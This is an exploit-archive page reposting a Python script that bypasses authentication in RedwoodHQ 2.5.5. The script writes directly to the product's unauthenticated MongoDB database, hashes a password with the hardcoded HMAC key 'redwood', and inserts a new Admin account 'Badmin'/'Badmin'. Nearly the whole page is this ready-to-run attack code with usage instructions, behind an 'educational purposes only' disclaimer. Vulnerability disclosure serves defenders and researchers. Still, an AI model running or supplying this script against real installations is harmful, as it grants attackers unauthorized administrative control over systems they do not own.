Redwoodhq 2.5.5 authentication bypass Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2019-06-17 | Type : webapps | Platform : multiple
This exploit / vulnerability Redwoodhq 2.5.5 authentication bypass is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

# -*- encoding: utf-8 -*-
#!/usr/bin/python3

# Exploit Title: RedxploitHQ (Create Admin User by missing authentication on db)
# Date: 14-june-2019
# Exploit Author: EthicalHCOP
# Version: 2.0 / 2.5.5
# Vendor Homepage: https://redwoodhq.com/
# Software Link: https://redwoodhq.com/redwood-download/
# Tested on: Ubuntu and Windows.
# Twitter: @EthicalHcop
# Usage: python3 RedxploitHQ.py -H mongo_host -P mongo_port
# Description: Use RedxploitHQ to create a new Admin user into redwoodhq and get all the functions on the framework
#
# RedwoodHQ doesn't require that MongoDB is installed on the machine because this tool have her own Mongo Launcher.
# The problem is that this vendor database doesn't require any authentication to read her data.
# So, I use the same syntax that use the Framework to create my admin user on the database and access into the tool
#
# POC: https://youtu.be/MK9AvoJDtxY

import hashlib
import hmac
import optparse
from pymongo import MongoClient

def CreateHMAC(Pass):
message = bytes(Pass,encoding='utf8')
secret = bytes('redwood',encoding='utf8')
hash = hmac.new(secret, message, hashlib.md5)
return (hash.hexdigest())

def DbConnect(ip,port):
uri = "mongodb://" + ip + ":" + port + "/"
con = MongoClient(uri)
return con

def DbDisconnect(con):
con.close()

def CreateBadminUser(ip, port, user, passw):
con = DbConnect(ip, port)
db = con.automationframework
usr = db.users
passw = CreateHMAC(passw)
data = {
"name": user,
"password": passw,
"tag": [],
"role": "Admin",
"username": user,
"status": ""
}
usr.insert_one(data)
DbDisconnect(con)

def start():
parser = optparse.OptionParser('usage %prog ' + \
'-H host -P port')
parser.add_option('-P', '--Port', dest='port', type='string', \
help='MongoDB Port')
parser.add_option('-H', '--Host', dest='host', type='string', \
help='MongoDB Host')
(options, args) = parser.parse_args()
ip = options.host
port = options.port
if (str(ip) == "None"):
print("Insert Host")
exit(0)
if (str(port) == "None"):
port = "27017"
try:
CreateBadminUser(str(ip), str(port), 'Badmin', 'Badmin')
print("[+] New user 'Badmin'/'Badmin' created.")
except Exception as e:
print("[-] Can't create the 'Badmin'/'Badmin' user. Error: "+str(e))

if __name__ == '__main__':
start()